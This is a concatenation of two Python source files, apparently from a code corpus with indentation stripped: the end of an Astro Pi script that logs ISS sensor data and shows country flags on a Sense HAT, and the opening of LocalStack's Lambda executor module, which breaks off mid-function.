,G,G,G,G,G,G,G,G,G,G,G,G,],"BA":[B,W,GO,GO,GO,GO,GO,B,B,W,GO,GO,GO,GO,GO,B,B,B,W,GO,GO,GO,GO,B,B,B,W,GO,GO,GO,GO,B,B,B,B,W,GO,GO,GO,B,B,B,B,B,W,GO,GO,B,B,B,B,B,W,GO,GO,B,B,B,B,B,B,W,GO,B,],"BD":[DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,R,R,DG,DG,DG,DG,DG,R,R,R,R,DG,DG,DG,R,R,R,R,R,R,DG,DG,R,R,R,R,R,R,DG,DG,DG,R,R,R,R,DG,DG,DG,DG,DG,R,R,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,],"BE":[BL,BL,BL,Y,Y,R,R,R,BL,BL,BL,Y,Y,R,R,R,BL,BL,BL,Y,Y,R,R,R,BL,BL,BL,Y,Y,R,R,R,BL,BL,BL,Y,Y,R,R,R,BL,BL,BL,Y,Y,R,R,R,BL,BL,BL,Y,Y,R,R,R,BL,BL,BL,Y,Y,R,R,R,],"BF":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,Y,Y,R,R,R,G,G,G,Y,Y,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,],"BG":[W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,DG,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"BH":[W,W,W,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,W,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,W,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,W,R,R,R,R,R,W,W,R,R,R,R,R,R,],"BI":[W,R,R,R,R,R,R,W,G,W,R,R,R,R,W,G,G,G,W,W,W,W,G,G,G,G,W,R,R,W,G,G,G,G,W,R,R,W,G,G,G,G,W,W,W,W,G,G,G,W,R,R,R,R,W,G,W,R,R,R,R,R,R,W,],"BJ":[DG,DG,DG,Y,Y,Y,Y,Y,DG,DG,DG,Y,Y,Y,Y,Y,DG,DG,DG,Y,Y,Y,Y,Y,DG,DG,DG,Y,Y,Y,Y,Y,DG,DG,DG,R,R,R,R,R,DG,DG,DG,R,R,R,R,R,DG,DG,DG,R,R,R,R,R,DG,DG,DG,R,R,R,R,R,],"BN":[W,W,Y,Y,Y,Y,Y,Y,BL,W,W,Y,Y,Y,Y,Y,BL,BL,W,R,R,Y,Y,Y,Y,BL,R,R,R,R,Y,Y,Y,Y,R,R,R,R,Y,Y,Y,Y,Y,R,R,W,W,Y,Y,Y,Y,Y,BL,BL,W,W,Y,Y,Y,Y,Y,BL,BL,W,],"BW":[L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,W,W,W,W,W,W,W,W,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,W,W,W,W,W,W,W,W,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,],"CF":[DB,DB,DB,R,R,DB,DB,DB,DB,Y,DB,R,R,DB,DB,DB,W,W,W,R,R,W,W,W,W,W,W,R,R,W,W,W,G,G,G,R,R,G,G,G,G,G,G,R,R,G,G,G,Y,Y,Y,R,R,Y,Y,Y,Y,Y,Y,R,R,Y,Y,Y,],"CG":[G,G,G,G,G,G,G,Y,G,G,G,G,G,G,Y,Y,G,G,G,G,G,Y,Y,R,G,G,G,G,Y,Y,R,R,G,G,G,Y,Y,R,R,R,G,G,Y,Y,R,R,R,R,G,Y,Y,R,R,R,R,R,Y,Y,R,R,R,R,R,R,],"CI":[O,O,O,W,W,G,G,G,O,O,O,W,W,G,G,G,O,O,O,W,W,G,G,G,O,O,O,W,W,G,G,G,O,O,O,W,W,G,G,G,O,O,O,W,W,G,G,G,O,O,O,W,W,G,G,G,O,O,O,W,W,G,G,G,],"CL":[DB,DB,DB,W,W,W,W,W,DB,W,DB,W,W,W,W,W,DB,W,DB,W,W,W,W,W,DB,DB,DB,W,W,W,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"CM":[DG,DG,R,R,R,R,Y,Y,DG,DG,R,R,R,R,Y,Y,DG,DG,R,R,R,R,Y,Y,DG,DG,R,Y,Y,R,Y,Y,DG,DG,R,Y,Y,R,Y,Y,DG,DG,R,R,R,R,Y,Y,DG,DG,R,R,R,R,Y,Y,DG,DG,R,R,R,R,Y,Y,],"CO":[Y,Y,Y,Y,
Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"CR":[DB,DB,DB,DB,DB,DB,DB,DB,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,DB,DB,DB,DB,DB,DB,DB,DB,],"DK":[R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,R,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,R,],"DO":[DB,DB,DB,W,W,R,R,R,DB,DB,DB,W,W,R,R,R,DB,DB,DB,W,W,R,R,R,W,W,W,DB,R,W,W,W,W,W,W,R,DB,W,W,W,R,R,R,W,W,DB,DB,DB,R,R,R,W,W,DB,DB,DB,R,R,R,W,W,DB,DB,DB,],"EC":[Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,L,L,Y,Y,Y,DB,DB,DB,G,G,DB,DB,DB,DB,DB,DB,Y,Y,DB,DB,DB,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"PH":[W,DB,DB,DB,DB,DB,DB,DB,Y,W,DB,DB,DB,DB,DB,DB,W,W,W,DB,DB,DB,DB,DB,W,Y,Y,W,DB,DB,DB,DB,W,Y,Y,W,R,R,R,R,W,W,W,R,R,R,R,R,Y,W,R,R,R,R,R,R,W,R,R,R,R,R,R,R,],"UG":[BL,BL,BL,BL,BL,BL,BL,BL,Y,Y,Y,Y,Y,Y,Y,Y,R,R,R,W,W,R,R,R,R,R,W,BL,W,W,R,R,BL,BL,W,BL,BL,W,BL,BL,BL,BL,BL,W,W,BL,BL,BL,Y,Y,Y,Y,Y,Y,Y,Y,R,R,R,R,R,R,R,R,],"TZ":[G,G,G,G,G,G,Y,BL,G,G,G,G,G,Y,BL,BL,G,G,G,G,Y,BL,BL,Y,G,G,G,Y,BL,BL,Y,L,G,G,Y,BL,BL,Y,L,L,G,Y,BL,BL,Y,L,L,L,Y,BL,BL,Y,L,L,L,L,BL,BL,Y,L,L,L,L,L,],"TN":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,R,R,R,R,R,W,R,R,W,R,R,R,R,W,R,R,W,R,R,R,R,R,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"NO":[R,W,DB,DB,W,R,R,R,R,W,DB,DB,W,R,R,R,W,W,DB,DB,W,W,W,W,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,DB,W,W,DB,DB,W,W,W,W,R,W,DB,DB,W,R,R,R,R,W,DB,DB,W,R,R,R,],"ME":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,GO,R,R,GO,R,R,R,R,GO,GO,GO,GO,R,R,R,R,R,GO,GO,R,R,R,R,R,GO,GO,GO,GO,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"OM":[R,R,R,W,W,W,W,W,R,W,R,W,W,W,W,W,R,R,R,W,W,W,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,G,G,G,G,G,R,R,R,G,G,G,G,G,R,R,R,G,G,G,G,G,],"PA":[W,W,W,W,R,R,R,R,W,DB,DB,W,R,R,R,R,W,DB,DB,W,R,R,R,R,W,W,W,W,R,R,R,R,DB,DB,DB,DB,W,W,W,W,DB,DB,DB,DB,W,R,R,W,DB,DB,DB,DB,W,R,R,W,DB,DB,DB,DB,W,W,W,W,],"PE":[R,R,W,W,W,W,R,R,R,R,W,W,W,W,R,R,R,R,W,G,G,W,R,R,R,R,G,W,W,G,R,R,R,R,G,R,R,G,R,R,R,R,W,G,G,W,R,R,R,R,W,W,W,W,R,R,R,R,W,W,W,W,R,R,],"MK":[Y,R,R,Y,Y,R,R,Y,R,Y,R,Y,Y,R,Y,R,R,R,Y,Y,Y,Y,R,R,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,R,R,Y,Y,Y,Y,R,R,R,Y,R,Y,Y,R,Y,R,Y,R,R,Y,Y,R,R,Y,],"MG":[W,W,W,R,R,R,R,R,W,W,W,R,R,R,R,R,W,W,W,R,R,R,R,R,W,W,W,R,R,R,R,R,W,W,W,DG,DG,DG,DG,DG,W,W,W,DG,DG,DG,DG,DG,W,W,W,DG,DG,DG,DG,DG,W,W,W,DG,DG,DG,DG,DG,],"EE":[L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W],"FI":[W,W,B,B,W,W,W,W,W,W,B,B,W,W,W,W,W,W,B,B,W,W,W,W,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,W,W,B,B,W,W,W,W,W,W,B,B,W,W,W,W,W,W,B,B,W,W,W,W],"GA":[G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L,L],"GE":[W,W,W,R,R,W,W,W,W,R,W,R,R,W,R,W,W,W,W,R,R,W,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,R,R,W,W,W,W,R,W,R,R,W,R,W,W,W,W,R,R,W,W,W],"GH":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,Y,Y,Y,BL,BL,Y,Y,Y,Y,Y,BL,BL,BL,BL,Y,Y,Y,Y,Y,BL,BL,Y,Y,Y,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G],"GT":[L,L,W,W,W,L,L,L,L,L,W,W,W,L,L,L,L,L,W,DG,W,L,L,L,L,L,DG,Y,DG,L,L,L,L,L,W,DG,W,L,L,L,L,L,W,W,W,L,L,L,L,L,W,W,W,L,L,L,L,L,W,W,W,L,L,L],"GY":[W,W,W,W,W,W,G,G,BL,Y,Y,Y,Y,Y,W,G,R,BL,BL,Y,Y,Y,W,G,R,R,R,BL,Y,Y,Y,W,R,R,R,BL,Y,Y,Y,W,R,BL,BL,Y,Y,Y,W,G,BL,Y,Y,Y,Y,W,G,G,W,W,W,W,W,G,G,G],"HN":[B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,W,W,B,W,W,B,W,W,W,B,W,W,W,W,B,W,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B],"IE":[G,G,G,W,W,O,O,O,G,G,G,W,W,O,O,O,G,G,G,W,W,O,O,O,G,G,G,W,W,O,O
,O,G,G,G,W,W,O,O,O,G,G,G,W,W,O,O,O,G,G,G,W,W,O,O,O,G,G,G,W,W,O,O,O],"IL":[W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,W,W,W,W,B,W,W,W,W,W,W,B,W,W,W,W,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W],"IS":[B,W,R,R,W,B,B,B,B,W,R,R,W,B,B,B,W,W,R,R,W,W,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,R,R,W,W,W,W,B,W,R,R,W,B,B,B,B,W,R,R,W,B,B,B],"KE":[BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,R,R,BL,BL,BL,W,W,W,R,R,W,W,W,R,R,BL,W,R,BL,R,R,R,R,BL,R,W,BL,R,R,W,W,W,R,R,W,W,W,G,G,G,R,R,G,G,G,G,G,G,G,G,G,G,G],"KH":[B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,R,R,R,R,R,R,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,R,R,W,W,W,W,R,R,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B],"LA":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,B,B,B,W,W,B,B,B,B,B,W,W,W,W,B,B,B,B,W,W,W,W,B,B,B,B,B,W,W,B,B,B,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R],"LR":[B,B,B,R,R,R,R,R,B,W,B,R,R,R,R,R,B,B,B,W,W,W,W,W,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R],"LT":[DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR],"MA":[DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,G,G,DR,DR,DR,DR,DR,G,G,G,G,DR,DR,DR,DR,DR,G,G,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR,DR],"NZ":[W,R,W,B,B,B,B,B,R,R,R,B,B,B,B,B,W,R,W,B,B,R,B,B,B,B,B,B,B,B,B,B,B,B,B,B,R,B,R,B,B,B,B,B,B,B,B,B,B,B,B,B,B,R,B,B,B,B,B,B,B,B,B,B],"LV":[BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,BR,]}
# Creates a timedelta representing the total duration of the experiment
stop_delta = datetime.timedelta(minutes=running_time)
# Creates a datetime variable to store the start time of the experiment
start_time = datetime.datetime.now()
# Sets the approximate distance (in m) from the Earth's surface to the ISS
self.distance_ISS_earth = 400000
# Sets earth mass
self.earth_mass = 5.9722 * (10 ** 24)
# Sets the universal gravitational constant (in m^3 kg^-1 s^-2)
self.gravitational_constant = 6.67 * (10 ** -11)
# Sets ISS mass
self.ISS_mass = 419700
# Earth radius
self.earth_radius = 6371 * (10 ** 3)
# Sets the running_time (in min) for the experiment
self.running_time = running_time
# Calculates the stop_time for the experiment
self.stop_time = start_time + stop_delta
def calculate_force(self):
"""Calculating force and speed for the ISS
@return: dict
"""
# Calculating force
force = (self.gravitational_constant * self.ISS_mass * self.earth_mass) / ((self.distance_ISS_earth + self.earth_radius) ** 2)
# Calculating speed
speed = math.sqrt((self.gravitational_constant * self.earth_mass) / (self.distance_ISS_earth + self.earth_radius))
# Packs the force and speed into a dictionary
measurements_dict = {'force': force, 'speed': speed}
return measurements_dict
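# Illustrative sanity check (kept as comments, not executed): with the constants set in
# __init__, the orbital radius is r = earth_radius + distance_ISS_earth
# = 6371e3 + 400e3 = 6.771e6 m, so roughly:
#   force = G * m_ISS * m_Earth / r**2
#         = 6.67e-11 * 419700 * 5.9722e24 / (6.771e6)**2  ~ 3.6e6 N
#   speed = sqrt(G * m_Earth / r)
#         = sqrt(6.67e-11 * 5.9722e24 / 6.771e6)          ~ 7.7e3 m/s
# which matches the commonly quoted ISS orbital speed of about 7.7 km/s.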
def check_time(self):
"""Checks if the time for the experiment is up
@return: Boolean
"""
# Create a datetime variable to store the current time
now_time = datetime.datetime.now()
# Checks whether the experiment time has run out
if (now_time < self.stop_time):
return True
return False
def check_sleep(self, timedelta_seconds):
"""Checks if can sleep or if the current_time + sleep_time exceeds project time
@param1: int
@return: Boolean
"""
# Gets current time
now = datetime.datetime.now()
# Calculates time after sleep
after_timedelta = datetime.timedelta(seconds=timedelta_seconds)
# Checks if it is possible to sleep
if (now + after_timedelta < self.stop_time):
return True
return False
def get_coordinates_ISS(self):
"""Get's current ISS coordinates
@return: dict
"""
# Sets the constant variables for finding the ISS location
name = "ISS (ZARYA)"
satellite1 = "1 25544U 98067A 20013.25395446 .00001038 00000-0 26560-4 0 9999"
satellite2 = "2 25544 51.6448 40.0308 0005021 125.1468 332.5313 15.49559205207846"
# Gets ISS location
iss = ephem.readtle(name, satellite1, satellite2)
iss.compute()
# Formats the coordinates
lat = int(str(iss.sublat).split(":")[0]) + int(str(iss.sublat).split(":")[1])*0.01
long = int(str(iss.sublong).split(":")[0]) + int(str(iss.sublong).split(":")[1])*0.01
coordinates_dict = {'lat': lat, 'long': long}
return coordinates_dict
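# Note: ephem.readtle() builds a satellite object from the two-line element (TLE) set above,
# and iss.sublat / iss.sublong stringify as "deg:min:sec". The conversion above approximates
# decimal degrees as degrees + minutes * 0.01 (an exact conversion would divide the minutes
# by 60); the result is only used to look up the territory below the ISS, so the rough
# approximation is presumably considered good enough here.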
def write_data_continuously(self, files):
"""Writes humidity, temperature and pressure for the current time (every 60s)
@return: None
"""
# Runs while there is experiment time remaining
while (self.check_time()):
# Writes data to file
self.write_data_csv(files[0])
self.write_force_csv(files[1])
# Sleeps if possible
if (self.check_sleep(60)):
sleep(60)
else:
return None
def write_data_csv(self, file):
"""Writes current data to the csv file"""
# Connect to the Sense HAT
sh = SenseHat()
# Get current time formatted
now = datetime.datetime.utcnow()
dt_string = now.strftime("%d/%m/%Y, %H:%M:%S")
# Read data from Sense HAT
temperature = sh.get_temperature()
humidity = sh.get_humidity()
pressure = sh.get_pressure()
# Format the data from the Sense HAT
temperature = "{0:.2f}".format(temperature)
humidity = "{0:.2f}".format(humidity)
pressure = "{0:.2f}".format(pressure)
# Save the data to the file
file.info("%s, %s, %s, %s", dt_string, humidity, temperature, pressure)
def setup_logger(self, dir_path, name):
"""Tries to create csv logger object"""
try:
#Try to create a file at the dir_path
handler = logging.FileHandler(dir_path)
formatter = logging.Formatter('%(message)s')
handler.setFormatter(formatter)
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
self.created_file = True
return logger
except Exception:
self.created_file = False
def write_force_csv(self, file):
"""Writes the force and speed data to the designated csv file"""
#Gets measurements
measurements = self.calculate_force()
force = measurements['force']
speed = measurements['speed']
force = "{0:.2f}".format(force)
speed = "{0:.2f}".format(speed)
# Get current time formatted
now = datetime.datetime.utcnow()
dt_string = now.strftime("%d/%m/%Y, %H:%M:%S")
# Save the data to the file
file.info("%s, %s, %s", dt_string, speed, force)
def show_country_countinously(self):
"""Updates the country flags on the SenseHat LED Matrix (every 5s)"""
self.geo = rg.RGeocoder(mode=2, verbose=True, stream=io.StringIO(open(os.path.dirname(os.path.realpath(__file__)) + '/custom.csv', encoding='utf-8').read()))
# Runs while there is experiment time remaining
while (self.check_time()):
self.show_country()
# Sleeps if possible
if (self.check_sleep(5)):
sleep(5)
else:
return None
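# Note: the reverse geocoder is built from a bundled custom.csv passed in as a stream. That
# dataset is assumed to extend the standard country codes with the pseudo-codes 'InO', 'AtO'
# and 'PaO', which show_country() below uses to label the Indian, Atlantic and Pacific
# oceans when the ISS is not above land.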
def show_country(self):
"""Gets the country that is below ISS
@return: dict
"""
# Gets ISS coordinates
coordinates_dict = self.get_coordinates_ISS()
coordinates = (coordinates_dict['lat'], coordinates_dict['long']),
# Find the country below ISS
result = self.geo.query(coordinates)[0]['cc']
sense = SenseHat()
#Displays the ocean name
if result == 'InO':
sense.show_message('Indian Ocean', text_colour = [255, 255, 255], back_colour = [0, 0, 255])
return
elif result == 'AtO':
sense.show_message('Atlantic Ocean', text_colour = [255, 255, 255], back_colour = [0, 0, 255])
return
elif result == 'PaO':
sense.show_message('Pacific Ocean', text_colour = [255, 255, 255], back_colour = [0, 0, 255])
return
#Displays the country flag
for flag in self.flags:
if result == flag:
sense.set_pixels(self.flags[flag])
return
# Creates the Astro_Pi objects (one per worker thread)
runtime = 1
ASTRO_PI_OBJ = Astro_Pi(runtime)
ASTRO_PI_OBJ1 = Astro_Pi(runtime)
# Sets the dir_path for the csv file
dir_path01 = os.path.dirname(os.path.realpath(__file__)) + "/data01.csv"
file01 = ASTRO_PI_OBJ.setup_logger(dir_path01, 'data01.csv')
file01.info("%s, %s, %s, %s, %s", 'Date(UTC)', 'Time(UTC)', 'Humidity', 'Temperature(C)', 'Pressure(hPa)')
dir_path02 = os.path.dirname(os.path.realpath(__file__)) + "/data02.csv"
file02 = ASTRO_PI_OBJ.setup_logger(dir_path02, 'data02.csv')
file02.info("%s, %s, %s, %s", 'Date(UTC)', 'Time(UTC)', 'Speed(m/s)', 'Force(N)')
# Starts one thread to write the CSV data and another to update the LED matrix
x = threading.Thread(target=ASTRO_PI_OBJ.write_data_continuously, args = ([file01, file02], ))
y = threading.Thread(target=ASTRO_PI_OBJ1.show_country_countinously)
x.start()
y.start()
# Waits for both threads to finish
x.join()
y.join()
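# Summary: the script runs two workers for `runtime` minutes:
# - write_data_continuously logs humidity/temperature/pressure and the computed force/speed
#   to data01.csv and data02.csv once every 60 seconds;
# - show_country_countinously refreshes the Sense HAT LED matrix every 5 seconds with the
#   flag (or ocean name) of the territory currently below the ISS.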
|
lambda_executors.py
|
import base64
import contextlib
import glob
import json
import logging
import os
import re
import subprocess
import sys
import threading
import time
import traceback
import uuid
from multiprocessing import Process, Queue
from typing import Any, Callable, Dict, List, Optional, Tuple, Union
from localstack import config
from localstack.constants import DEFAULT_LAMBDA_CONTAINER_REGISTRY
from localstack.services.awslambda.lambda_utils import (
API_PATH_ROOT,
LAMBDA_RUNTIME_PROVIDED,
get_main_endpoint_from_container,
get_record_from_event,
is_java_lambda,
is_nodejs_runtime,
rm_docker_container,
store_lambda_logs,
)
from localstack.services.install import GO_LAMBDA_RUNTIME, INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils import bootstrap
from localstack.utils.aws import aws_stack
from localstack.utils.aws.aws_models import LambdaFunction
from localstack.utils.aws.dead_letter_queue import (
lambda_error_to_dead_letter_queue,
sqs_error_to_dead_letter_queue,
)
from localstack.utils.cloudwatch.cloudwatch_util import cloudwatched
from localstack.utils.common import (
TMP_FILES,
CaptureOutput,
get_all_subclasses,
get_free_tcp_port,
in_docker,
is_port_open,
json_safe,
last_index_of,
long_uid,
md5,
now,
retry,
run,
run_safe,
safe_requests,
save_file,
short_uid,
timestamp,
to_bytes,
to_str,
truncate,
wait_for_port_open,
)
from localstack.utils.docker_utils import (
DOCKER_CLIENT,
ContainerException,
DockerContainerStatus,
PortMappings,
)
from localstack.utils.run import FuncThread
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = "cloud.localstack.LambdaExecutor"
LAMBDA_HANDLER_ENV_VAR_NAME = "_HANDLER"
EVENT_FILE_PATTERN = "%s/lambda.event.*.json" % config.dirs.tmp
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
MAX_ENV_ARGS_LENGTH = 20000
# port number used in lambci images for stay-open invocation mode
STAY_OPEN_API_PORT = 9001
INTERNAL_LOG_PREFIX = "ls-daemon: "
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
# SQS event source name
EVENT_SOURCE_SQS = "aws:sqs"
# maps lambda arns to concurrency locks
LAMBDA_CONCURRENCY_LOCK = {}
# CWD folder of handler code in Lambda containers
DOCKER_TASK_FOLDER = "/var/task"
# Lambda event type
LambdaEvent = Union[Dict[str, Any], str, bytes]
class InvocationException(Exception):
def __init__(self, message, log_output=None, result=None):
super(InvocationException, self).__init__(message)
self.log_output = log_output
self.result = result
class LambdaContext(object):
DEFAULT_MEMORY_LIMIT = 1536
def __init__(
self, lambda_function: LambdaFunction, qualifier: str = None, context: Dict[str, Any] = None
):
context = context or {}
self.function_name = lambda_function.name()
self.function_version = lambda_function.get_qualifier_version(qualifier)
self.client_context = context.get("client_context")
self.invoked_function_arn = lambda_function.arn()
if qualifier:
self.invoked_function_arn += ":" + qualifier
self.cognito_identity = context.get("identity")
self.aws_request_id = str(uuid.uuid4())
self.memory_limit_in_mb = lambda_function.memory_size or self.DEFAULT_MEMORY_LIMIT
self.log_group_name = "/aws/lambda/%s" % self.function_name
self.log_stream_name = "%s/[1]%s" % (timestamp(format="%Y/%m/%d"), short_uid())
def get_remaining_time_in_millis(self):
# TODO implement!
return 1000 * 60
class AdditionalInvocationOptions:
# Maps file keys to file paths. The keys can be used as placeholders in the env. variables
# and command args to reference files - e.g., given `files_to_add` as {"f1": "/local/path"} and
# `env_updates` as {"MYENV": "{f1}"}, the Lambda handler will receive an environment variable
# `MYENV=/lambda/path` and the file /lambda/path will be accessible to the Lambda handler
# (either locally, or inside Docker).
files_to_add: Dict[str, str]
# Environment variable updates to apply for the invocation
env_updates: Dict[str, str]
# Updated command to use for starting the Lambda process (or None)
updated_command: Optional[str]
# Updated handler as entry point of Lambda function (or None)
updated_handler: Optional[str]
def __init__(
self,
files_to_add=None,
env_updates=None,
updated_command=None,
updated_handler=None,
):
self.files_to_add = files_to_add or {}
self.env_updates = env_updates or {}
self.updated_command = updated_command
self.updated_handler = updated_handler
class InvocationResult:
def __init__(self, result, log_output=""):
if isinstance(result, InvocationResult):
raise Exception("Unexpected invocation result type: %s" % result)
self.result = result
self.log_output = log_output or ""
class InvocationContext:
lambda_function: LambdaFunction
function_version: str
handler: str
event: LambdaEvent
lambda_command: Union[str, List[str]] # TODO: change to List[str] ?
docker_flags: Union[str, List[str]] # TODO: change to List[str] ?
environment: Dict[str, Optional[str]]
context: LambdaContext
invocation_type: str # "Event" or "RequestResponse"
def __init__(
self,
lambda_function: LambdaFunction,
event: LambdaEvent,
environment=None,
context=None,
lambda_command=None,
docker_flags=None,
function_version=None,
invocation_type=None,
):
self.lambda_function = lambda_function
self.handler = lambda_function.handler
self.event = event
self.environment = {} if environment is None else environment
self.context = {} if context is None else context
self.lambda_command = lambda_command
self.docker_flags = docker_flags
self.function_version = function_version
self.invocation_type = invocation_type
class LambdaExecutorPlugin:
"""Plugin abstraction that allows to hook in additional functionality into the Lambda executors."""
INSTANCES: List["LambdaExecutorPlugin"] = []
def initialize(self):
"""Called once, for any active plugin to run initialization logic (e.g., downloading dependencies).
Uses lazy initialization - i.e., runs only after the first should_apply() call returns True"""
pass
def should_apply(self, context: InvocationContext) -> bool:
"""Whether the plugin logic should get applied for the given Lambda invocation context."""
return False
def prepare_invocation(
self, context: InvocationContext
) -> Optional[Union[AdditionalInvocationOptions, InvocationResult]]:
"""Return additional invocation options for given Lambda invocation context. Optionally, an
InvocationResult can be returned, in which case the result is returned to the client right away."""
return None
def process_result(
self, context: InvocationContext, result: InvocationResult
) -> InvocationResult:
"""Optionally modify the result returned from the given Lambda invocation."""
return result
def init_function_configuration(self, lambda_function: LambdaFunction):
"""Initialize the configuration of the given function upon creation or function update."""
pass
def init_function_code(self, lambda_function: LambdaFunction):
"""Initialize the code of the given function upon creation or function update."""
pass
@classmethod
def get_plugins(cls) -> List["LambdaExecutorPlugin"]:
if not cls.INSTANCES:
classes = get_all_subclasses(LambdaExecutorPlugin)
cls.INSTANCES = [clazz() for clazz in classes]
return cls.INSTANCES
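# Minimal sketch of a custom executor plugin, kept as a comment: get_plugins() above
# auto-registers every concrete subclass of LambdaExecutorPlugin, so an uncommented example
# class would immediately become active. The environment variable name is hypothetical.
#
# class EnvInjectorPlugin(LambdaExecutorPlugin):
#     def should_apply(self, context: InvocationContext) -> bool:
#         return True
#
#     def prepare_invocation(self, context: InvocationContext):
#         # add an extra environment variable to every invocation
#         return AdditionalInvocationOptions(env_updates={"MY_CUSTOM_FLAG": "1"})
#
# LambdaInvocationForwarderPlugin below is the in-tree example of this mechanism.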
class LambdaInvocationForwarderPlugin(LambdaExecutorPlugin):
"""Plugin that forwards Lambda invocations to external targets defined in LAMBDA_FORWARD_URL"""
def should_apply(self, context: InvocationContext) -> bool:
"""If LAMBDA_FORWARD_URL is configured, forward the invocation of this Lambda to the target URL."""
func_forward_url = self._forward_url(context)
return bool(func_forward_url)
def prepare_invocation(
self, context: InvocationContext
) -> Optional[Union[AdditionalInvocationOptions, InvocationResult]]:
forward_url = self._forward_url(context)
result = self._forward_to_url(
forward_url,
context.lambda_function,
context.event,
context.context,
